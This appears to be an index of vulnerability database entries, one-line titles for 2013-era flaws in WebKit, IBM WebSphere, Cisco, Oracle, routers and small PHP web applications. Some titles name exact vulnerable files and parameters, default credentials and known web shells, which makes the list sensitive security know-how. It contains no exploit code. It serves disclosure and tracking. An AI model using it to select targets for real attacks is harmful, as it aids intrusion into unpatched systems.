[94814] WebKit HTMLMediaElement Deletion Event Handling Use-after-free Arbitrary Code Execution
[94813] WebKit WebVTTElement::createEquivalentHTMLElement Function Element Creation Unspecified Issue
[94809] Intelligent Platform Management Interface (IPMI) Null-length Credentials Authentication Bypass
[94799] Symantec Security Information Manager Web-GUI API Query Handling Information Disclosure
[94748] IBM WebSphere Application Server (WAS) Administrative Console Unspecified CSRF
[94747] IBM WebSphere Application Server (WAS) OAuth Unspecified Remote Credential Disclosure
[94746] IBM WebSphere Application Server (WAS) Unspecified Issue
[94745] IBM WebSphere Application Server (WAS) UNIX Platform Process Initialization Local Command Execution
[94744] IBM WebSphere Application Server (WAS) Administrative Console Unspecified XSS
[94743] IBM WebSphere Application Server (WAS) Administrative Console Caching Weakness Local Information Disclosure
[94713] IBM WebSphere MQ Multiple setuid mqm Commands Buffer Overflow
[94704] libvirt virConnectListAllInterfaces() Method struct netcf_if Object Crafted Command Handling Double-free Local DoS
[94676] Monroe Electronics Multiple Product Admin Web Server Predictable Session ID Generation
[94609] Cisco Multiple Product Web Framework GUI HTTP / HTTPS Request Handling Remote DoS
[94605] Cisco Multiple Product Web Framework Crafted URL Handling Remote Command Execution
[94604] Cisco Multiple Product Web Framework IronPort Spam Quarantine (ISQ) Function TCP Connection Request Saturation Remote DoS
[94603] Cisco Web Security Appliance Web Framework Crafted URL Handling Remote Command Execution
[94559] WebKit AnalyserNode::AnalyserNode Function Web Audio Handling Memory Corruption
[94545] IceWarp Mail Server /webmail/calendar/index.html Unspecified XSS
[94467] Cisco WebEx Social Unspecified Authentication Hijack CSRF
[94458] Cybozu Live for Android WebView Class Local Information Disclosure
[94453] Epiphany Crafted Web Content file:/// URI Handling Arbitrary File Access
[94422] IBM WebSphere Cast Iron Unspecified Information Disclosure
[94418] Canon Multiple Printer Admin Interface Default Unpassworded Account
[94417] Canon Multiple Printer Admin Interface Cleartext WPA2 Key Disclosure
[94408] Cybozu Live for Android Web Content Handling Unspecified Arbitrary Command Execution
[94395] IBM Application Manager For Smart Business Tivoli Monitoring Internal Web Server Multiple Unspecified Spoofing Weaknesses
[94389] IBM WebSphere Commerce Enterprise Padding Oracle Attack User Personal Information Disclosure
[94321] Galapagos Browser for Android WebView Class Local Information Disclosure
[94320] Angel Browser for Android WebView Class Local Information Disclosure
[94296] Siemens WinCC Web Navigator NetBIOS User Name Enumeration
[94293] Siemens WinCC Web Navigator Login Screen Unspecified SQL Injection
[94292] Siemens WinCC Web Navigator Unspecified Hardcoded Account
[94194] Cisco Video Surveillance Operations Manager Help Page Crafted URL Handling Arbitrary Web Page Loading
[94189] IBM Data Studio Web Console Unspecified Traversal Arbitrary File Access
[94123] Microsoft IE Webpage Script Debugging Memory Corruption
[94097] Intrasrv Simple Web Server Crafted HTTP Request Handling Remote Buffer Overflow
[94013] CTERA Portal WEBDAV Authentication Account Lockout Bypass
[93981] Multiple Web Server Web Banner Information Disclosure
[93919] Cisco WebEx Meetings Server Event Center Module Crafted Request Handling Information Disclosure
[93918] WebKit XSS Auditor URL Manipulation Weakness
[93917] WebKit iframe Handling Unspecified XSS
[93916] WebKit Unspecified Memory Corruption (2013-1023)
[93915] WebKit Unspecified Memory Corruption (2013-1009)
[93910] WebKit RenderBlock::markAllDescendantsWithFloatsForLayout Function Use-after-free Arbitrary Code Execution
[93909] WebKit Form Control Element Handling Use-after-free Issue
[93908] WebKit dispatchEditableContentChangedEvents Function Use-after-free Arbitrary Code Execution
[93893] WebKit StyleElement::clearSheet Function Use-after-free Arbitrary Code Execution
[93888] Google Chrome DevToolsWindow Inspected WebContents Handling Use-after-free Issue
[93886] WebKit TextIterator::rangeFromLocationAndLength Function Use-after-free Arbitrary Code Execution
[93844] Google Chrome WebMediaPlayerClientImpl.cpp HTML5 Audio Handling Use-after-free Arbitrary Code Execution
[93749] Webform Module for Drupal Labels Created Components XSS
[93748] IBM WebSphere Portal Web Content Viewer Portlet XSS
[93745] Splunk Web Unspecified XSS
[93727] IBM WebSphere Portal Unspecified HTTP Response Splitting
[93722] ZNC modules/webadmin.cpp NULL Pointer Dereference Remote DoS
[93684] WebKit ApplyStyleCommand::splitAncestorsWithUnicodeBidi() Function Synchronous Event Handling Use-after-free Arbitrary Code Execution
[93682] Cisco WebEx for iOS SSL Certificate Validation MitM Spoofing Weakness
[93649] WebKit RenderBlock::addChildIgnoringAnonymousColumnBlocks Function Spanning Element In Columns Handling DoS Weakness
[93642] WebKit DOMSelection::containsNode Function Use-after-free Arbitrary Code Execution
[93640] WebKit Fullscreened Element Inline Splitting Bad Cast Memory Corruption
[93637] WebKit RenderBlock::splitFlow / RenderInline::splitFlow Floating Objects Handling Use-after-free Issue
[93580] WebKit SVG SVGElement Destructor Data Cleanup Use-after-free Arbitrary Code Execution
[93578] WebKit Drag and Drop / Copy and Paste srcdoc Attribute XSS
[93574] Google Chrome Web Audio Unspecified Memory Corruption (188092)
[93573] WebKit StyleResolver::styleForElement Function Style Resolution Use-after-free Arbitrary Code Execution
[93562] IBM WebSphere DataPower SOA Appliances SOAP Message Body XSS
[93548] SAP Network Interface Router (SAProuter) Crafted NI Route Message Handling Heap Buffer Overflow
[93538] SAP NetWeaver Gateway SAP Management Console SOAP Interface Unauthenticated Configuration Download
[93512] web2py /applications/welcome/static/js/share.js Unspecified XSS
[93504] Wireshark Websocket Dissector Malformed Packet Handling Remote Stack Buffer Overflow DoS
[93489] WebKit Unspecified Memory Corruption (2013-1011)
[93488] WebKit Unspecified Memory Corruption (2013-1010)
[93487] WebKit Unspecified Memory Corruption (2013-1008)
[93486] WebKit Unspecified Memory Corruption (2013-1007)
[93485] WebKit Unspecified Memory Corruption (2013-1006)
[93484] WebKit Unspecified Memory Corruption (2013-1005)
[93483] WebKit Unspecified Memory Corruption (2013-1004)
[93482] WebKit Unspecified Memory Corruption (2013-1003)
[93481] WebKit Unspecified Memory Corruption (2013-1002)
[93480] WebKit Unspecified Memory Corruption (2013-1001)
[93479] WebKit Unspecified Memory Corruption (2013-1000)
[93478] WebKit Unspecified Memory Corruption (2013-0999)
[93477] WebKit Unspecified Memory Corruption (2013-0998)
[93476] WebKit Unspecified Memory Corruption (2013-0997)
[93475] WebKit Unspecified Memory Corruption (2013-0996)
[93474] WebKit Unspecified Memory Corruption (2013-0995)
[93473] WebKit Unspecified Memory Corruption (2013-0994)
[93472] WebKit Unspecified Memory Corruption (2013-0993)
[93471] WebKit Unspecified Memory Corruption (2013-0992)
[93470] WebKit Unspecified Memory Corruption (2013-0991)
[93467] Stanford WebAuth CGI::Application login.fcgi Cross-session Cookie Disclosure
[93456] MiniWeb HTTP Server Crafted POST Request Handling Remote Overflow DoS
[93393] Cisco WebEx Social Post URL XSS
[93392] Cisco WebEx Social Multiple Field Value Manipulation
[93306] Microsoft Office Publisher PUB File Corrupt Interface Pointer Handling Arbitrary Code Execution
[93277] ZyXEL ZyWALL Web Configurator Default Password
[93250] WebKit Frame Handling Multiple Use-after-free Issues
[93249] WebKit WebCore::AudioNodeOutput::pull Function Web Audio Handling Use-after-free Arbitrary Code Execution
[93248] WebKit HTMLMediaElement::removedFrom Function Track Deleted During Video Element Deletion DoS
[93185] Cisco Unified Presence (CUP) Web Framework Malformed TCP Packet Handling Memory Exhaustion Remote DoS
[93112] Juniper Junos Space / JA1500 Web UI Configuration Tabs Plaintext Password Disclosure
[93110] Cisco Unified Customer Voice Portal (CVP) Tomcat Web Management Component User-supplied Application Execution
[93105] Cisco Unified Customer Voice Portal (CVP) Tomcat Web Management Component Unspecified Remote Privilege Escalation
[93103] NetApp OnCommand System Manager SnapMirror Interface Arbitrary File Access
[93102] NetApp OnCommand System Manager Halt/Reboot Interface Arbitrary Command Execution
[93101] NetApp OnCommand System Manager /zapiServlet User Management Interface Multiple Parameter XSS
[93100] NetApp OnCommand System Manager Group Management Interface comment Parameter XSS
[93099] NetApp OnCommand System Manager Share Management Interface comment Parameter XSS
[93098] NetApp OnCommand System Manager /zapiServlet CIFS Configuration Management Interface Multiple Parameter XSS
[93097] NetApp OnCommand System Manager LUN Management Interface comment Parameter XSS
[93084] GroundWork Monitor Enterprise Foundation /foundation-webapp/admin/manage-configuration.jsp nagios Account /usr/local/groundwork/ Arbitrary File Manipulation
[93075] Forbes Magazine Microsoft Office 365 T-Mobile Router Admin Interface Default Password
[93056] IBM WebSphere DataPower XC10 Unspecified Unauthenticated Admin Command Execution
[93055] WeBid yourauctions_p.php startnow Parameter SQL Injection
[93051] EasyWebScripts Craigslist Clone Gold index.php catid Parameter SQL Injection
[93048] IBM Sterling Secure Proxy HTTP Header Web Server Version Disclosure
[93046] Beat Websites beats.php gid Parameter SQL Injection
[93042] VideoJS video-js.swf ExternalInterface.call() Method readyFunction Parameter XSS
[93008] Apache VCL Web GUI Unspecified Remote Privilege Escalation
[93003] Cisco WebEx Crafted Request Uninitialized Memory Remote Disclosure
[92940] Cisco WebEx Crafted HTTP Request Handling Cache Directory File Disclosure
[92931] Microsoft System Center Operations Manager Web Console /InternalPages/ViewTypeManager.aspx Multiple Parameter XSS
[92895] HP Service Manager Web Tier Component Unspecified XSS
[92894] HP Service Manager Web Tier Component Unspecified Remote Information Disclosure
[92893] Cisco Prime Central for Hosted Collaboration Solution (HCS) OpenView Web Menus Unspecified XSS
[92892] Cisco Prime Central for Hosted Collaboration Solution (HCS) Netcool Impact (NCI) Web Menus Unspecified XSS
[92885] IBM Sametime Classic Meeting Server Web Application Component Unspecified XSS
[92818] WebKit Object Element beforeload Event Frame Removal Use-after-free Arbitrary Code Execution
[92813] VMware vCenter Server Appliance (vCSA) Virtual Appliance Management Interface (VAMI) Unspecified Arbitrary File Upload
[92811] VMware vCenter Server Appliance (vCSA) Virtual Appliance Management Interface (VAMI) Unspecified Arbitrary File Execution
[92803] CommuniGate Pro Webmail Email Reply Content Parsing XSS
[92788] jigbrowser+ Application for Android Crafted Website Handling Address Bar Spoofing Weakness
[92781] IBM WebSphere MQ amqxcs2.dll xcsGetMem Function Packet Parsing Integer Overflow
[92780] IBM WebSphere MQ TCPReceive Function Signedness Error Heap Overflow Remote DoS
[92769] Cisco NX-OS Software Management Interface Crafted Jumbo Frame Packet Handling Remote DoS
[92761] Cisco Unified Computing System Manager Web Console Login Page Malformed Request LDAP User Authentication Bypass
[92716] Lexmark Markvision Enterprise Diagnostic Interface Unauthenticated Remote Command Execution
[92715] IBM WebSphere Application Server (WAS) Web 2.0 / Mobile Toolkit RPC Adapter Unspecified XSS
[92714] IBM WebSphere Application Server (WAS) Admin Console Unspecified Traversal
[92713] IBM WebSphere Application Server (WAS) Local OS Registry Validation Remote Restriction Bypass
[92712] IBM WebSphere Application Server (WAS) Admin Console Unspecified XSS
[92711] IBM WebSphere Application Server (WAS) localOS Registry / WIM Handling Local Overflow DoS
[92710] IBM WebSphere Application Server (WAS) Liberty Profile Cookie Validation Failure Remote Authentication Bypass
[92709] Apache ActiveMQ Web Console Unauthenticated Remote Access
[92708] Apache ActiveMQ Sample Web Application Broker Resource Consumption Remote DoS
[92707] Apache ActiveMQ webapp/websocket/chat.js Subscribe Message XSS
[92694] ERDAS ER Viewer ermapper_u.dll ERM_convert_to_correct_webpath() Function ERS File Handling Stack Buffer Overflow
[92675] WebKit 'CompositeEditCommand::cloneParagraphUnderNewElement' Function Use-after-free Arbitrary Code Execution
[92640] All in One Webmaster Plugin for WordPress Script Insertion CSRF
[92586] pd-admin WebFTP Overview Create new directory Field XSS
[92560] SoSci Survey Unprivileged Admin Interface Navigation Element Exposure
[92544] icedtea-web JAR File Format Verification Arbitrary Code Execution
[92543] icedtea-web Cross-domain Applet Class Loader Applet Manipulation
[92502] WebKit 'ApplyStyleCommand::splitAncestorsWithUnicodeBidi' Function Use-after-free Issue
[92501] WebKit Selected Option Inserted Into Select Element Handling Memory Corruption
[92500] WebKit 'RenderObject::willBeDestroyed' Function Use-after-free Issue
[92499] WebKit errorEventSender Pending Load Events Interaction Use-after-free Issue
[92461] Oracle GlassFish Server REST Interface Subcomponent Unspecified Remote Issue
[92460] Oracle GlassFish Server ADMIN Interface Subcomponent Unspecified Remote Issue
[92443] Oracle Primavera P6 Enterprise Project Portfolio Management Web Access Subcomponent Unspecified Remote Issue (2013-2411)
[92442] Oracle Primavera P6 Enterprise Project Portfolio Management Web Access Subcomponent Unspecified Remote Issue (2013-2405)
[92420] Oracle Web Services Manager Web Services Security Subcomponent Unspecified Remote Issue
[92416] Oracle Siebel CRM Siebel Enterprise Application Integration Component Web Services Subcomponent Unspecified Remote Information Disclosure
[92414] Oracle Siebel CRM Siebel Enterprise Application Integration Component Web Services Subcomponent Unspecified Remote Information Disclosure
[92412] Oracle Siebel CRM Siebel Enterprise Application Integration Component Web Services Subcomponent Unspecified Remote Issue
[92389] Oracle WebCenter Content Server Subcomponent Unspecified Remote Issue (2013-1522)
[92388] Oracle WebCenter Interaction Image Service Subcomponent Unspecified Remote Issue
[92387] Oracle WebCenter Capture Import Server Subcomponent BlackIceDevMode.ocx ActiveX SetAnnotationFont() Method Arbitrary Code Execution
[92386] Oracle WebCenter Content Server CheckOutAndOpen.dll ActiveX Multiple Method Code Execution
[92385] Oracle WebCenter Sites /cs/Satellite Multiple Parameter HTTP Header Injection
[92384] Oracle WebCenter Content Server Subcomponent Unspecified Remote Issue (2013-1503)
[92383] Oracle WebCenter Content Server Subcomponent Unspecified Remote Information Disclosure
[92379] Oracle WebLogic Server WebLogic Console Subcomponent Unspecified Remote Issue (2013-2390)
[92378] Oracle WebLogic Server console/console.portal SNMPMonitoringTablePortlet[SNMPMonitoringTable]sortby Parameter XSS
[92375] Oracle HTTP Server Web Listener Subcomponent Unspecified Remote DoS
[92374] Oracle COREid Access WebGate - WebServer Plugin Subcomponent Unspecified Remote Issue
[92371] Oracle Java JDK / JRE JavaFX WebPage Class getPage Method Overwrite Remote Arbitrary Code Execution
[92299] Dillo Web Browser CSS :visited Pseudo-class Handling Browsing History Disclosure
[92273] Free Monthly Websites /admin/file_io.php Admin Password Manipulation
[92259] RESTful Web Services for Drupal Cache Poisoning Remote DoS
[92254] jPlayer Jplayer.swf ExternalInterface.call() Method jQuery Parameter XSS
[92227] Juniper Junos J-Web Sajax Unspecified Remote Code Execution
[92206] Cisco IOS XE on 1000 Series Aggregation Services Routers (ASR) Bridge Domain Interface Malformed Packet Handling Remote DoS
[92200] MiniWeb HTTP Server Non-existent Directory Arbitrary File Upload
[92198] MiniWeb HTTP Server filename Parameter Traversal Arbitrary File Upload
[92188] IBM TRIRIGA Application Platform /WebProcess.srv attr_seq_1001 Parameter XSS
[92170] IBM TRIRIGA Application Platform /WebProcess.srv translationsDocumentManager Scan Name XSS
[92149] Dart Communications DartWebserver.Dll Malformed Request Null Pointer Dereference Remote DoS
[92083] WebKit RenderBlock::splitTablePartsAroundChild Nested Table Splitting Bad Cast Memory Corruption
[92082] WebKit Table Splitting Child Handling Bad Cast Memory Corruption
[92080] TinyWebGallery image.php Multiple Parameter Malformed Input Path Disclosure
[92061] WebKit Non-HTML Element Inline Style Removal Bad Cast Memory Corruption
[92052] CUPS cupsd.conf Listen Directive Admin Interface Restriction IPv6 Connection Bypass
[91984] C2 WebResource fileview.asp File Parameter XSS
[91978] TinyWeb Malformed HTTP Request Remote DoS
[91957] Sophos Web Appliance /rss.php xss Parameter XSS
[91956] Sophos Web Appliance /end-user/errdoc.php msg Parameter XSS
[91955] Sophos Web Appliance /end-user/ftp_redirect.php h Parameter XSS
[91954] Sophos Web Appliance /index.php threat Parameter XSS
[91953] Sophos Web Appliance /cgi-bin/patience.cgi id Parameter Traversal Arbitrary File Access
[91952] Sophos Web Appliance Multiple Functionality Remote Command Execution
[91951] Feedweb Plugin for WordPress /wp-content/plugins/feedweb/widget_remove.php wp_post_id Parameter XSS
[91901] Juniper IVE OS Web Server Unspecified Cross-session Information Disclosure
[91900] WebKit WebCore/html/HTMLMediaElement.cpp HTMLMediaElement Destructor Use-after-free Arbitrary Code Execution
[91899] WebKit WebCore/dom/Node.cpp Node::enclosingBlockFlowElement Function Bad Cast Arbitrary Code Execution
[91897] Juniper Mobility System Software (MSS) WebAAA Login (wba_login.html) XSS
[91879] Mozilla Multiple Products WebGL Rendering Mesa Graphics Driver on Linux Invalid Free Arbitrary Code Execution
[91864] IBM InfoSphere Information Server Web Console Unspecified XSS
[91863] IBM WebSphere Commerce Configuration File Plain Text Password Disclosure
[91861] RuggedCom Rugged Operating System on LinuX (ROX II) Web API Command Execution
[91852] Juniper Junos J-Web SSL Low-bit Cipher Weakness
[91842] STUNSHELL Web Shell Unauthenticated Remote Command Execution
[91841] v0pCr3w Web Shell Unauthenticated Remote Command Execution
[91840] Roundcube Webmail file_get_contents() Call save-prefs Request Handling Arbitrary File Access
[91801] WebKit RenderObject::offsetParent Flow Thread Content Node offsetParent Access DoS
[91800] WebKit ShadowRoot Listening Touch Event Handling Use-after-free Arbitrary Code Execution
[91799] WebKit ARIA Spin Button Creation Type Confusion DoS Issue
[91797] Juniper NetScreen IDP Web Management Perl Interpreter Unspecified Remote Command Execution
[91773] Juniper JunosE netBufLib.c Malformed Multicast Packet Handling SRP Interface Remote DoS
[91772] Juniper DX3250 / DX3650 HP WebInspect Tool Invalid ClientKeyExchange Request Handling Remote DoS
[91739] Atmail WebMail /index.php/mail/viewmessage/getattachment/folder/INBOX/uniqueId/ File Name Parameter XSS
[91709] Google Chrome Isolated Web Sites Process Handling Unspecified Issue
[91701] WebKit AudioNodeInput::numberOfChannels Web Audio Handling Use-after-free Arbitrary Code Execution
[91692] Moodle Site-wide WebDav Repository Instances Options Access Restriction Weakness
[91689] Moodle WebDav Repository Plaintext Password Disclosure
[91682] Splunk Web Component Unspecified XSS (SPL-60629)
[91665] IBM Rational Policy Tester / Security AppScan Enterprise Manual Explore Browser Plugin Webpage Handling Platform Credential Disclosure
[91589] IBM Domino webadmin.nsf command Field XSS
[91588] IBM Domino webadmin.nsf Command Execution CSRF
[91578] IBM Rational ClearQuest Web Client Unspecified XSS
[91577] IBM Tivoli Endpoint Manager Web Reports Unspecified XSS
[91575] Askiaweb /WebProd/cgi-bin/AskiaExt.dll Multiple Parameter XSS
[91574] Askiaweb /WebProd/pages/pgHistory.asp nHistoryId Parameter SQL Injection
[91573] Askiaweb /WebProd/pages/pgadmin.asp OrderBy Parameter SQL Injection
[91566] Linux Kernel dcb Netlink Interface Multiple Stack Memory Disclosures
[91564] Linux Kernel Bridging RTM_GETMDB Netlink Interface / RTNLGRP_MDB Notify Message Handling Information Disclosure
[91513] Wind River Systems' VxWorks WebCLI Component Crafted Command String Remote DoS
[91512] Wind River Systems' VxWorks Web Server Malformed URI Handling Remote DoS
[91504] WebKit 'WebCore::AXObjectCache::getOrCreate' Table Section Access Use-after-free
[91485] Aruba Mobility Controller ArubaOS Administration WebUI Dashboard SSID XSS
[91466] IBM WebSphere Application Server (WAS) library.policy Server-associated Shared Libraries Permission Assignment Weakness
[91465] IBM WebSphere Application Server (WAS) trackDependencies Functionality JSP Dependencies Caching Weakness
[91464] IBM WebSphere Application Server (WAS) Web Services on Solaris Certificate Validation Weakness
[91462] lighttpd on Debian Linux Socket Symlink Web Server Configuration Manipulation
[91430] WebKit Unspecified Memory Corruption (2013-0960)
[91429] WebKit Unspecified Memory Corruption (2013-0961)
[91425] TIBCO Spotfire Web Player Unspecified XSS
[91424] TIBCO Spotfire Web Player Unspecified Access Restriction Bypass
[91324] IBM WebSphere Application Server (WAS) on zSeries updatedata Method Double-free DoS
[91323] IBM WebSphere Application Server (WAS) Default Messaging Component Message Saturation Remote DoS
[91317] Siemens WinCC (TIA Portal) Web Server Unspecified Persistent XSS
[91316] Siemens WinCC (TIA Portal) Web Server URL Handling Remote Source Code Disclosure
[91315] Siemens WinCC (TIA Portal) Web Server Unspecified HTTP Response Splitting
[91314] Siemens WinCC (TIA Portal) Web Server Unspecified Link Handling Script Insertion Weakness
[91313] Siemens WinCC (TIA Portal) Web Server Unspecified Reflected XSS
[91308] Siemens WinCC (TIA Portal) Web Server Insecure Storage Local Credential Disclosure
[91307] Siemens WinCC (TIA Portal) Web Server HTTP Request Handling Remote DoS
[91306] Siemens SIMATIC WinCC SQL Database WebNavigator Password Obfuscation Weakness
[91305] Siemens SIMATIC WinCC SQL Database Obfuscated WebNavigator Password Disclosure
[91296] Apple Mac OS X CoreTypes Java Web Start Application Launch Handling Disable Java Plugin Setting Bypass
[91273] Web Cookbook /cook/searchrecipe.php Multiple Parameter SQL Injection
[91272] Web Cookbook /cook/showtext.php mode Parameter SQL Injection
[91268] Kodak Insite Creative Workflow System /TwAmWeb/EmailPassword.asp user_name Parameter SQL Injection
[91220] WebKit SVGViewSpec::viewTarget SVG Element Handling Type Confusion Arbitrary Code Execution
[91207] WebKit HTMLInputElement Event Processing ImageLoader Deletion Use-after-free Arbitrary Code Execution
[91183] Schneider Electric CD Kerwin kerweb.exe Page Refresh Saturation Memory Exhaustion Remote DoS
[91173] Apache Wicket WebApplicationPath Constructor Bypass /WEB-INF/ Directory File Access
[91117] WebKit HTMLMediaElement Destructor Use-after-free Arbitrary Code Execution
[91116] WebKit RenderTable::addChild Table Section Moving Unspecified Issue
[91115] WebKit loader/ImageLoader.cpp ImageLoader Element Inside SVGImageElement Deletion Issue
[91101] IBM WebSphere Application Server (WAS) WASServiceTrace.log Unspecified Local Information Disclosure
[91098] IBM WebSphere Application Server (WAS) esi:include JSP GET Request Remote DoS
[91097] IBM WebSphere Application Server (WAS) Cached Credential Authentication Policy Bypass
[91096] IBM WebSphere Application Server (WAS) Security Manager Custom Setting Overwrite Weakness
[91095] IBM WebSphere Application Server (WAS) Crafted Cache Key Cross-user Authentication Weakness
[91094] IBM WebSphere Application Server (WAS) on Solaris ESI Response Processing Remote DoS
[91092] IBM WebSphere Application Server (WAS) Security Credential Cache Unspecified Issue
[91090] IBM WebSphere Application Server (WAS) componentmap.gskit.xml File Permission Weakness
[91089] IBM WebSphere Application Server (WAS) Service Integration Bus Security Update Dynamic Propagation Weakness
[91088] IBM WebSphere Application Server (WAS) WebSphere Caching Proxy Error Page XSS
[91087] IBM WebSphere Application Server (WAS) icu4j Implementation Java2security Unspecified Issue
[91086] IBM WebSphere Application Server (WAS) Public Mbean Unspecified Generated XML File Disclosure
[91085] IBM WebSphere Application Server (WAS) plugin-cfg.xml File Permission Unspecified Issue
[91084] IBM WebSphere Application Server (WAS) bindingiterator.destory() Function Unauthorized Use
[91083] IBM WebSphere Application Server (WAS) PD Tools *=audit Trace Specification Logging Failure
[91082] IBM WebSphere Application Server (WAS) Plug-in WebSphere App Traffic IHS DoS
[91081] IBM WebSphere Application Server (WAS) Portlet Parallel Rendering Unspecified Issue
[91080] IBM WebSphere Application Server (WAS) Asynchronous Socket Reconnect Handling Remote Stack Overflow
[91078] phpWebSite Default Admin Credentials
[91077] WebKit html/shadow/SliderThumbElement.cpp RenderBox Type Confusion Arbitrary Code Execution
[91071] Exsite Webware Default Administrator Credentials
[91069] IBM WebSphere Application Server (WAS) Service Data Objects Repository Unauthorized Access
[91066] IBM WebSphere Application Server (WAS) on Windows was.policy File Permission Handling Weakness
[91065] IBM WebSphere Application Server (WAS) User Security Group Privilege Revocation Persistent Access Weakness
[91064] IBM WebSphere Application Server (WAS) Security Constraint Deployment Weakness
[90894] WebKit Web Audio Channel Handling Race Condition Buffer Overflow
[90849] WebKit XSSAuditorDelegate::didBlockScript / XSSAuditor::filterToken Page Block document.referrer Disclosure
[90845] WebKit addChildNodesToDeletionQueue SVG Animation Handling Use-after-free
[90844] WebKit Web Audio Panner Node Model Processing Race Condition Memory Corruption
[90843] Google Chrome WebContentsImpl::CreateOpenerRenderViews Browser Navigation Handling Use-after-free
[90842] WebKit FrameLoader::checkCompleted Frame Loader Subframe Deletion Use-after-free
[90836] IBM WebSphere Commerce Web Services Framework Unspecified Remote DoS
[90803] Juniper Junos J-Web Management Module Unspecified XSS
[90780] Websense TRITON Unified Security Center Unspecified SQL Injection
[90779] Websense TRITON Unified Security Center Multiple Unspecified XSS
[90778] Websense TRITON Unified Security Center Unspecified DoS
[90777] Websense TRITON Unified Security Center Crafted Cookie Handling Multiple Page Access Restriction Bypass
[90776] Websense TRITON Unified Security Center Multiple Page Authentication Bypass
[90759] Juniper Junos J-Web HTTP POST Entity Content Request Handling Remote Overflow
[90755] Juniper Junos J-Web Unauthenticated Arbitrary Privileged Account Creation
[90734] XEROX WorkCentre Web Console Default Administrator Password
[90698] PHP-Fusion /administration/weblink_cats.php Multiple Parameter XSS
[90669] WebCalendar category.php Category Name Field XSS
[90668] WebCalendar Invalid Login Handling Username Enumeration
[90663] WebKit MathML Implementation Unspecified Issue
[90628] Rix4Web Portal add-site.php dir_link Parameter SQL Injection
[90626] EasyWebScripts eBay Clone Script lostpassword.php msg Parameter XSS
[90625] EasyWebScripts eBay Clone Script showcategory.php cid Parameter XSS
[90624] EasyWebScripts eBay Clone Script signinform.php msg Parameter XSS
[90623] EasyWebScripts eBay Clone Script signinform.php msg Parameter HTTP Response Splitting
[90622] EasyWebScripts eBay Clone Script gallery.php cid Parameter SQL Injection
[90621] EasyWebScripts eBay Clone Script product_desc.php id Parameter SQL Injection
[90620] EasyWebScripts eBay Clone Script showcategory.php cid Parameter SQL Injection
[90615] Cisco Cloud Portal nsAPI Interface Crafted URL Handling Remote User Information Disclosure
[90614] Adobe Flash Player ExternalInterface ActionScript Feature SWF File Handling Arbitrary Code Execution
[90603] skunkWEB sw.log Permission Weakness Local Information Disclosure
[90585] webfs on Gentoo Linux webfsd.log Permission Weakness Local Information Disclosure
[90557] Apache HTTP Server mod_proxy_balancer balancer-manager Interface Multiple Parameter XSS
[90552] Web Cookbook admin/dumpdb.php outfile Parameter Traversal Arbitrary File Access
[90551] Web Cookbook rezeptanzeige.php currid Parameter SQL Injection
[90527] Google Chrome Web Store API Permission Weakness
[90522] WebKit 'AbstractDatabase::AbstractDatabase' Database Handling Use-after-free
[90521] WebKit AudioScheduledSourceNode::updateSchedulingInfo Web Audio Node Integer Underflow Memory Corruption
[90450] WebKit RenderBlock::updateFirstLetter Style Sheet Handling Use-after-free Remote Code Execution
[90449] WebKit Unspecified Style Sheet Handling Use-after-free Remote Code Execution
[90448] WebKit RenderObjectChildList::updateBeforeAfterContent Style Sheet Handling Use-after-free
[90447] WebKit RenderObject::addChild Table Cell Handling Use-after-free Remote Code Execution
[90446] WebKit :before Content Location Style Sheet Handling Use-after-free Remote Code Execution
[90426] Mozilla Multiple Product Wrapped WebIDL Object Handling Arbitrary Code Execution
[90408] Django Admin Interface Access Permission Verification Object History Disclosure
[90390] WebKit V8DOMWindow::namedPropertyGetter Same Origin Policy Bypass
[90389] WebKit XSLT-generated Document Security Origin Inheritance Same Origin Policy Bypass
[90388] WebKit ScriptController::executeIfJavaScriptURL Synchronous Frame Load Confusion Same Origin Policy Bypass
[90387] WebKit DOMWindow Sub-objects Recreation After Navigation Same Origin Policy Bypass
[90380] Monroe Electronics Multiple One-Net EAS Products Web Server Default Admin Credentials
[90288] IBM InfoSphere DataStage Information Server Web Console /LoggingViewAdmin.do Multiple Parameter XSS
[90281] Roundup anydbm Interface Python Backtrace Hashed Password Disclosure
[90280] OpenEMR /interface/main/calendar/index.php Multiple Parameter XSS
[90279] OpenEMR /interface/main/messages/messages.php Error Message noteid Parameter XSS
[90278] OpenEMR /interface/main/messages/messages.php Multiple Parameter XSS
[90271] OpenEMR /interface/main/messages/messages.php Multiple Parameter SQL Injection
[90259] Epicor Returns Management SOAP Interface Unspecified SQL Injection
[90253] IBM CICS Transaction Server for z/OS Web Service Expired Password Authentication Bypass
[90188] SonicWALL Scrutinizer fa_web.cgi Multiple Parameter SQL Injection
[90185] Siemens CP 1604 / 1616 Interface Card Debugging Interface Crafted Packet Parsing Remote Code Execution
[90184] IBM WebSphere Message Broker SOAPInput WSDL File Request Error Message XSS
[90183] IBM WebSphere Cast Iron Cloud Integration Unspecified LDAP Authentication Weakness
[90182] IBM WebSphere Message Broker WS-Addressing / WS-Security Request Parsing Message Sending Authentication Bypass
[90181] IBM WebSphere Message Broker HTTPInput Nodes Query String Parsing Infinite Loop Remote DoS
[90177] Roundcube Webmail Email vbscript URI Handling XSS
[90175] Roundcube Webmail Email data URI Handling XSS
[90088] Atmel AT91SAM7XC Series Microprocessor JTAG Interface Crypto Key Local Disclosure
[90050] Google WebP libwebp/dsp.c Image Parsing Out-of-bounds Read Memory Disclosure Weakness
[90049] Google WebP libwebp/vp8.c Image Parsing Out-of-bounds Read Memory Disclosure Weakness
[90045] Google Chrome Web Data Database Form Data Storage Information Disclosure
[90019] VMware Multiple Product vmci.sys Virtual Machine Communication Interface (VMCI) Control Code Handling Local Privilege Escalation
[89952] Belkin N600 DB Wireless Router Browser Based Setup Web UI Unspecified Issue
[89946] Belkin F9K1002 N300 Wireless Router Web GUI Multiple Password Disclosures
[89850] EasyITSP /WEB/customer/voicemail.php Multiple Parameter Traversal Arbitrary File Manipulation
[89841] Cisco Unity Express /Web/SA3/AddHoliday.do holiday.description Parameter XSS
[89840] Free Monthly Websites /admin/index.php Input Type Field Manipulation Authentication Bypass
[89839] Free Monthly Websites /admin/add_main_pages.php File Upload Arbitrary Code Execution
[89837] Cisco Unity Express /Web/SA2/ScriptList.do gui_pagenotableData Parameter XSS
[89836] Cisco Unity Express /Web/SA/SaveConfiguration.do Multiple Action CSRF
[89834] IBM Tivoli Storage Manager (TSM) Client Web GUI Unspecified Remote Access
[89825] WebKit DataView Methods Access Negative Index Unspecified Impact
[89821] Emerson EC2-552 Condensing Unit Controller Web Server Default Credentials
[89820] WebKit FEComponentTransfer::apply feComponentTransfer Element Parsing OOB Function Pointer Array Call Issue
[89814] Calypso Control Systems ION-8r Web Server Default Admin Credentials
